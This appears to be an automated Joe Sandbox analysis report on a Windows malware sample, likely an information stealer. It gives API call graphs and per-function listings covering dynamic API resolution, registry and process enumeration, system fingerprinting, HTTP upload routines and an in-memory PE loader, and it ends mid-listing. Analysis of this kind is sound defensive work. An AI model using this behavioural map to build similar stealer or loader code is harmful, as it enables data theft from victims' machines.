15138->15140 15943 d40030 15139->15943 15142->13533 15153->15119 15475 d4a7a0 lstrcpy 15474->15475 15476 d31683 15475->15476 15477 d4a7a0 lstrcpy 15476->15477 15478 d31695 15477->15478 15479 d4a7a0 lstrcpy 15478->15479 15480 d316a7 15479->15480 15481 d4a7a0 lstrcpy 15480->15481 15482 d315a3 15481->15482 15482->14356 15484 d347c6 15483->15484 15485 d34838 lstrlen 15484->15485 15509 d4aad0 15485->15509 15487 d34848 InternetCrackUrlA 15488 d34867 15487->15488 15488->14433 15490 d4a740 lstrcpy 15489->15490 15491 d48b74 15490->15491 15492 d4a740 lstrcpy 15491->15492 15493 d48b82 GetSystemTime 15492->15493 15494 d48b99 15493->15494 15495 d4a7a0 lstrcpy 15494->15495 15496 d48bfc 15495->15496 15496->14448 15499 d4a931 15497->15499 15498 d4a988 15500 d4a7a0 lstrcpy 15498->15500 15499->15498 15501 d4a968 lstrcpy lstrcat 15499->15501 15502 d4a994 15500->15502 15501->15498 15502->14451 15503->14566 15505 d34eee 15504->15505 15506 d39af9 LocalAlloc 15504->15506 15505->14454 15505->14456 15506->15505 15507 d39b14 CryptStringToBinaryA 15506->15507 15507->15505 15508 d39b39 LocalFree 15507->15508 15508->15505 15509->15487 15510->14576 15511->14717 15512->14719 15513->14727 15642 d477a0 15514->15642 15517 d476c6 RegOpenKeyExA 15519 d47704 RegCloseKey 15517->15519 15520 d476e7 RegQueryValueExA 15517->15520 15518 d41c1e 15518->14809 15519->15518 15520->15519 15522 d41c99 15521->15522 15522->14823 15524 d41e09 15523->15524 15524->14865 15526 d41e84 15525->15526 15527 d47a9a wsprintfA 15525->15527 15526->14879 15527->15526 15529 d41efe 15528->15529 15530 d47b4d 15528->15530 15529->14893 15649 d48d20 LocalAlloc CharToOemW 15530->15649 15533 d4a740 lstrcpy 15532->15533 15534 d47bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15533->15534 15543 d47c25 15534->15543 15535 d47c46 GetLocaleInfoA 15535->15543 15536 d47d18 15537 d47d1e LocalFree 15536->15537 15538 d47d28 15536->15538 15537->15538 15539 d4a7a0 lstrcpy 15538->15539 15542 d47d37 15539->15542 15540 d4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15540->15543 15541 d4a8a0 lstrcpy 15541->15543 15542->14906 15543->15535 15543->15536 15543->15540 15543->15541 15545 d42008 15544->15545 15545->14921 15547 d494b5 15546->15547 15548 d49493 GetModuleFileNameExA CloseHandle 15546->15548 15549 d4a740 lstrcpy 15547->15549 15548->15547 15550 d42091 15549->15550 15550->14936 15552 d42119 15551->15552 15553 d47e68 RegQueryValueExA 15551->15553 15552->14950 15554 d47e8e RegCloseKey 15553->15554 15554->15552 15556 d47fb9 GetLogicalProcessorInformationEx 15555->15556 15557 d47fd8 GetLastError 15556->15557 15559 d48029 15556->15559 15558 d48022 15557->15558 15567 d47fe3 15557->15567 15562 d42194 15558->15562 15564 d489f0 2 API calls 15558->15564 15563 d489f0 2 API calls 15559->15563 15562->14964 15565 d4807b 15563->15565 15564->15562 15565->15558 15566 d48084 wsprintfA 15565->15566 15566->15562 15567->15556 15567->15562 15650 d489f0 15567->15650 15653 d48a10 GetProcessHeap RtlAllocateHeap 15567->15653 15569 d4220f 15568->15569 15569->14978 15571 d489b0 15570->15571 15572 d4814d GlobalMemoryStatusEx 15571->15572 15575 d48163 __aulldiv 15572->15575 15573 d4819b wsprintfA 15574 d42289 15573->15574 15574->14992 15575->15573 15577 d487fb GetProcessHeap RtlAllocateHeap wsprintfA 15576->15577 15579 d4a740 lstrcpy 15577->15579 15580 d4230b 15579->15580 15580->15006 15582 d4a740 lstrcpy 15581->15582 15588 d48229 15582->15588 15583 d48263 15585 d4a7a0 lstrcpy 15583->15585 15584 d4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15584->15588 15586 d482dc 15585->15586 15586->15023 15587 d4a8a0 lstrcpy 15587->15588 15588->15583 15588->15584 15588->15587 15590 d4a740 lstrcpy 15589->15590 15591 d4835c RegOpenKeyExA 15590->15591 15592 d483d0 15591->15592 15593 d483ae 15591->15593 15595 d48613 RegCloseKey 15592->15595 15596 d483f8 RegEnumKeyExA 15592->15596 15594 d4a7a0 lstrcpy 15593->15594 15606 d483bd 15594->15606 15597 d4a7a0 lstrcpy 15595->15597 15598 d4860e 15596->15598 15599 d4843f wsprintfA RegOpenKeyExA 15596->15599 15597->15606 15598->15595 15600 d48485 RegCloseKey RegCloseKey 15599->15600 15601 d484c1 RegQueryValueExA 15599->15601 15604 d4a7a0 lstrcpy 15600->15604 15602 d48601 RegCloseKey 15601->15602 15603 d484fa lstrlen 15601->15603 15602->15598 15603->15602 15605 d48510 15603->15605 15604->15606 15607 d4a9b0 4 API calls 15605->15607 15606->15049 15608 d48527 15607->15608 15609 d4a8a0 lstrcpy 15608->15609 15610 d48533 15609->15610 15611 d4a9b0 4 API calls 15610->15611 15612 d48557 15611->15612 15613 d4a8a0 lstrcpy 15612->15613 15614 d48563 15613->15614 15615 d4856e RegQueryValueExA 15614->15615 15615->15602 15616 d485a3 15615->15616 15617 d4a9b0 4 API calls 15616->15617 15618 d485ba 15617->15618 15619 d4a8a0 lstrcpy 15618->15619 15620 d485c6 15619->15620 15621 d4a9b0 4 API calls 15620->15621 15622 d485ea 15621->15622 15623 d4a8a0 lstrcpy 15622->15623 15624 d485f6 15623->15624 15624->15602 15626 d4a740 lstrcpy 15625->15626 15627 d486bc CreateToolhelp32Snapshot Process32First 15626->15627 15628 d4875d CloseHandle 15627->15628 15629 d486e8 Process32Next 15627->15629 15630 d4a7a0 lstrcpy 15628->15630 15629->15628 15631 d486fd 15629->15631 15632 d48776 15630->15632 15631->15629 15633 d4a8a0 lstrcpy 15631->15633 15634 d4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15631->15634 15632->15081 15633->15631 15634->15631 15636 d4a7a0 lstrcpy 15635->15636 15637 d451b5 15636->15637 15638 d31590 lstrcpy 15637->15638 15639 d451c6 15638->15639 15654 d35100 15639->15654 15641 d451cf 15641->15093 15645 d47720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15642->15645 15644 d476b9 15644->15517 15644->15518 15646 d47765 RegQueryValueExA 15645->15646 15647 d47780 RegCloseKey 15645->15647 15646->15647 15648 d47793 15647->15648 15648->15644 15649->15529 15651 d48a0c 15650->15651 15652 d489f9 GetProcessHeap HeapFree 15650->15652 15651->15567 15652->15651 15653->15567 15655 d4a7a0 lstrcpy 15654->15655 15656 d35119 15655->15656 15657 d347b0 2 API calls 15656->15657 15658 d35125 15657->15658 15814 d48ea0 15658->15814 15660 d35184 15661 d35192 lstrlen 15660->15661 15662 d351a5 15661->15662 15663 d48ea0 4 API calls 15662->15663 15664 d351b6 15663->15664 15665 d4a740 lstrcpy 15664->15665 15666 d351c9 15665->15666 15667 d4a740 lstrcpy 15666->15667 15668 d351d6 15667->15668 15669 d4a740 lstrcpy 15668->15669 15670 d351e3 15669->15670 15671 d4a740 lstrcpy 15670->15671 15672 d351f0 15671->15672 15673 d4a740 lstrcpy 15672->15673 15674 d351fd InternetOpenA StrCmpCA 15673->15674 15675 d3522f 15674->15675 15676 d358c4 InternetCloseHandle 15675->15676 15677 d48b60 3 API calls 15675->15677 15683 d358d9 ctype 15676->15683 15678 d3524e 15677->15678 15679 d4a920 3 API calls 15678->15679 15680 d35261 15679->15680 15681 d4a8a0 lstrcpy 15680->15681 15682 d3526a 15681->15682 15684 d4a9b0 4 API calls 15682->15684 15687 d4a7a0 lstrcpy 15683->15687 15685 d352ab 15684->15685 15686 d4a920 3 API calls 15685->15686 15688 d352b2 15686->15688 15695 d35913 15687->15695 15689 d4a9b0 4 API calls 15688->15689 15690 d352b9 15689->15690 15691 d4a8a0 lstrcpy 15690->15691 15692 d352c2 15691->15692 15693 d4a9b0 4 API calls 15692->15693 15694 d35303 15693->15694 15696 d4a920 3 API calls 15694->15696 15695->15641 15697 d3530a 15696->15697 15698 d4a8a0 lstrcpy 15697->15698 15699 d35313 15698->15699 15700 d35329 InternetConnectA 15699->15700 15700->15676 15701 d35359 HttpOpenRequestA 15700->15701 15703 d358b7 InternetCloseHandle 15701->15703 15704 d353b7 15701->15704 15703->15676 15705 d4a9b0 4 API calls 15704->15705 15706 d353cb 15705->15706 15707 d4a8a0 lstrcpy 15706->15707 15708 d353d4 15707->15708 15709 d4a920 3 API calls 15708->15709 15710 d353f2 15709->15710 15711 d4a8a0 lstrcpy 15710->15711 15712 d353fb 15711->15712 15713 d4a9b0 4 API calls 15712->15713 15714 d3541a 15713->15714 15715 d4a8a0 lstrcpy 15714->15715 15716 d35423 15715->15716 15717 d4a9b0 4 API calls 15716->15717 15718 d35444 15717->15718 15719 d4a8a0 lstrcpy 15718->15719 15720 d3544d 15719->15720 15721 d4a9b0 4 API calls 15720->15721 15722 d3546e 15721->15722 15815 d48ead CryptBinaryToStringA 15814->15815 15816 d48ea9 15814->15816 15815->15816 15817 d48ece GetProcessHeap RtlAllocateHeap 15815->15817 15816->15660 15817->15816 15818 d48ef4 ctype 15817->15818 15819 d48f05 CryptBinaryToStringA 15818->15819 15819->15816 15823->15096 16066 d39880 15824->16066 15826 d398e1 15826->15103 15828 d4a740 lstrcpy 15827->15828 16001 d4a740 lstrcpy 16000->16001 16002 d40266 16001->16002 16003 d48de0 2 API calls 16002->16003 16004 d4027b 16003->16004 16005 d4a920 3 API calls 16004->16005 16006 d4028b 16005->16006 16007 d4a8a0 lstrcpy 16006->16007 16008 d40294 16007->16008 16009 d4a9b0 4 API calls 16008->16009 16067 d3988e 16066->16067 16070 d36fb0 16067->16070 16069 d398ad ctype 16069->15826 16073 d36d40 16070->16073 16074 d36d63 16073->16074 16088 d36d59 16073->16088 16089 d36530 16074->16089 16078 d36dbe 16078->16088 16099 d369b0 16078->16099 16080 d36e2a 16081 d36ee6 VirtualFree 16080->16081 16083 d36ef7 16080->16083 16080->16088 16081->16083 16082 d36f41 16086 d489f0 2 API calls 16082->16086 16082->16088 16083->16082 16084 d36f26 FreeLibrary 16083->16084 16085 d36f38 16083->16085 16084->16083 16087 d489f0 2 API calls 16085->16087 16086->16088 16087->16082 16088->16069 16090 d36542 16089->16090 16092 d36549 16090->16092 16109 d48a10 GetProcessHeap RtlAllocateHeap 16090->16109 16092->16088 16093 d36660 16092->16093 16096 d3668f VirtualAlloc 16093->16096 16095 d36730 16097 d36743 VirtualAlloc 16095->16097 16098 d3673c 16095->16098 16096->16095 16096->16098 16097->16098 16098->16078 16100 d369c9 16099->16100 16104 d369d5 16099->16104 16101 d36a09 LoadLibraryA 16100->16101 16100->16104 16102 d36a32 16101->16102 16101->16104 16106 d36ae0 16102->16106 16110 d48a10 GetProcessHeap RtlAllocateHeap 16102->16110 16104->16080 16105 d36ba8 GetProcAddress 16105->16104 16105->16106 16106->16104 16106->16105 16107 d489f0 2 API calls 16107->16106 16108 d36a8b 16108->16104 16108->16107 16109->16092 16110->16108

                              Executed Functions

                              Function 00D49860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 d49860-d49874 call d49750 663 d49a93-d49af2 LoadLibraryA * 5 660->663 664 d4987a-d49a8e call d49780 GetProcAddress * 21 660->664 666 d49af4-d49b08 GetProcAddress 663->666 667 d49b0d-d49b14 663->667 664->663 666->667 669 d49b46-d49b4d 667->669 670 d49b16-d49b41 GetProcAddress * 2 667->670 671 d49b4f-d49b63 GetProcAddress 669->671 672 d49b68-d49b6f 669->672 670->669 671->672 673 d49b71-d49b84 GetProcAddress 672->673 674 d49b89-d49b90 672->674 673->674 675 d49bc1-d49bc2 674->675 676 d49b92-d49bbc GetProcAddress * 2 674->676 676->675
                              APIs
                              • GetProcAddress.KERNEL32(75900000,008D0570), ref: 00D498A1
                              • GetProcAddress.KERNEL32(75900000,008D0798), ref: 00D498BA
                              • GetProcAddress.KERNEL32(75900000,008D0600), ref: 00D498D2
                              • GetProcAddress.KERNEL32(75900000,008D0810), ref: 00D498EA
                              • GetProcAddress.KERNEL32(75900000,008D07B0), ref: 00D49903
                              • GetProcAddress.KERNEL32(75900000,008D8880), ref: 00D4991B
                              • GetProcAddress.KERNEL32(75900000,008C6820), ref: 00D49933
                              • GetProcAddress.KERNEL32(75900000,008C6840), ref: 00D4994C
                              • GetProcAddress.KERNEL32(75900000,008D07F8), ref: 00D49964
                              • GetProcAddress.KERNEL32(75900000,008D0828), ref: 00D4997C
                              • GetProcAddress.KERNEL32(75900000,008D05B8), ref: 00D49995
                              • GetProcAddress.KERNEL32(75900000,008D05D0), ref: 00D499AD
                              • GetProcAddress.KERNEL32(75900000,008C69A0), ref: 00D499C5
                              • GetProcAddress.KERNEL32(75900000,008D05E8), ref: 00D499DE
                              • GetProcAddress.KERNEL32(75900000,008D0630), ref: 00D499F6
                              • GetProcAddress.KERNEL32(75900000,008C66C0), ref: 00D49A0E
                              • GetProcAddress.KERNEL32(75900000,008D0648), ref: 00D49A27
                              • GetProcAddress.KERNEL32(75900000,008D08A0), ref: 00D49A3F
                              • GetProcAddress.KERNEL32(75900000,008C69E0), ref: 00D49A57
                              • GetProcAddress.KERNEL32(75900000,008D08B8), ref: 00D49A70
                              • GetProcAddress.KERNEL32(75900000,008C6860), ref: 00D49A88
                              • LoadLibraryA.KERNEL32(008D08E8,?,00D46A00), ref: 00D49A9A
                              • LoadLibraryA.KERNEL32(008D0900,?,00D46A00), ref: 00D49AAB
                              • LoadLibraryA.KERNEL32(008D0858,?,00D46A00), ref: 00D49ABD
                              • LoadLibraryA.KERNEL32(008D0870,?,00D46A00), ref: 00D49ACF
                              • LoadLibraryA.KERNEL32(008D0918,?,00D46A00), ref: 00D49AE0
                              • GetProcAddress.KERNEL32(75070000,008D0888), ref: 00D49B02
                              • GetProcAddress.KERNEL32(75FD0000,008D08D0), ref: 00D49B23
                              • GetProcAddress.KERNEL32(75FD0000,008D8FA0), ref: 00D49B3B
                              • GetProcAddress.KERNEL32(75A50000,008D8EF8), ref: 00D49B5D
                              • GetProcAddress.KERNEL32(74E50000,008C6740), ref: 00D49B7E
                              • GetProcAddress.KERNEL32(76E80000,008D89A0), ref: 00D49B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00D49BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00D49BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 9732b54038fcc10b284c362daef6d28e8bd04c267c04b5789f6f3004dd46c566
                              • Instruction ID: e5cc3c57073bc171a6ccc2a1b5f938952a685cd7eae74e5342efb8dc1d25a0eb
                              • Opcode Fuzzy Hash: 9732b54038fcc10b284c362daef6d28e8bd04c267c04b5789f6f3004dd46c566
                              • Instruction Fuzzy Hash: 5EA13BB55042489FD348EFA8ED89D6E3BF9F7CC301706451AA61DC3264D63998C2EB63
                              Function 00D345C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 d345c0-d34695 RtlAllocateHeap 781 d346a0-d346a6 764->781 782 d3474f-d347a9 VirtualProtect 781->782 783 d346ac-d3474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D3460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00D3479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34643
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 03a72b4b8aa36a53bf7982825bb1081b425f306335feee14b8a0574910eb13a5
                              • Instruction ID: 61e491bc5908dfca6b8bf58133ff12137fbcb9382818b11bef1582b84d9a9134
                              • Opcode Fuzzy Hash: 03a72b4b8aa36a53bf7982825bb1081b425f306335feee14b8a0574910eb13a5
                              • Instruction Fuzzy Hash: 4C4112607C27046EEE27BFA4A8D2EDD7766DF4770EF509840AE0052384CAB0756C8632
                              Function 00D34880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 d34880-d34942 call d4a7a0 call d347b0 call d4a740 * 5 InternetOpenA StrCmpCA 816 d34944 801->816 817 d3494b-d3494f 801->817 816->817 818 d34955-d34acd call d48b60 call d4a920 call d4a8a0 call d4a800 * 2 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a920 call d4a8a0 call d4a800 * 2 InternetConnectA 817->818 819 d34ecb-d34ef3 InternetCloseHandle call d4aad0 call d39ac0 817->819 818->819 905 d34ad3-d34ad7 818->905 829 d34f32-d34fa2 call d48990 * 2 call d4a7a0 call d4a800 * 8 819->829 830 d34ef5-d34f2d call d4a820 call d4a9b0 call d4a8a0 call d4a800 819->830 830->829 906 d34ae5 905->906 907 d34ad9-d34ae3 905->907 908 d34aef-d34b22 HttpOpenRequestA 906->908 907->908 909 d34b28-d34e28 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call 